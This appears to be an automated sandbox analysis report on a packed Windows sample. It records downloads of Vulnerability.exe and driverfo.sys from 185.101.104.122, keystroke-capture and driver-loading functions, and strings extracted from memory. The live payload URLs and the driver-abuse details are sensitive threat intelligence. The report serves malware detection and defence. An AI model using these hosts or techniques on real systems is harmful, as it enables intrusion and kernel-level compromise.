f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 d4 f7 12 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 63 5e 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 2a 00 00 00 23 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.26.0.5 104.26.0.5
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /driverfo.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: global traffic HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /driverfo.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: keyauth.win
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/D
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/VulneH)C
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exe&
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeJ)A
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeLMEMXxZ
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeT
Source: lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeZZC:
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1042000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sys
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sys$63
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sys.122/h
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sys.6
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysC6
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysC:
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysH6W
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysLMEMHhX
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysM6
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.sysUUC:
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.syst
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driverfo.syst6C
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/h
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://certs.apple.com/wwdrg3.der01
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://crl.apple.com/root.crl0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.apple.com/ocsp03-applerootca0.
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3010
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://keyauth.win/api/1.2/
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://keyauth.win/api/1.2/4-100I
Source: lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://keyauth.win/api/1.2/fo.sysv
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comR
Source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/
Source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/Y
Source: Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/AB6E94A209
Source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vsblobprodscussu5shard10.blob.core.windows.net/qy
Source: lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr String found in binary or memory: https://www.apple.com/certificateauthority/0
Source: lUAc7lqa56.exe, 00000000.00000002.1935015299.00007FF790082000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr, nULoYBmSWb.4.dr String found in binary or memory: https://www.globalsign.com/repository/03
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Installs a raw input device (often for capturing keystrokes)
Source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _stub_UserRegisterRawInputDevices memstr_be539d0e-1

System Summary
barindex
Detected VMProtect packer
Source: lUAc7lqa56.exe Static PE information: .vmp0 and .vmp1 section names
Contains functionality to call native functions
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC422900 RegCreateKeyW,RegSetKeyValueW,RegCloseKey,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,RegSetKeyValueW,RegCloseKey,RegCloseKey,GetModuleHandleA,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,RtlInitUnicodeString,NtLoadDriver,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC422900
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4232C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC4232C0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC416810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree, 4_2_00007FF7CC416810
Contains functionality to communicate with device drivers
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4145E0: LoadLibraryA,LoadLibraryA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,SymFromName,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_time64,GetCurrentThreadId,srand,rand,rand,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,memset,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,??7ios_base@std@@QEBA_NXZ,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,CreateFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,SymUnloadModule64,SymCleanup,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC4145E0
Contains functionality to load drivers
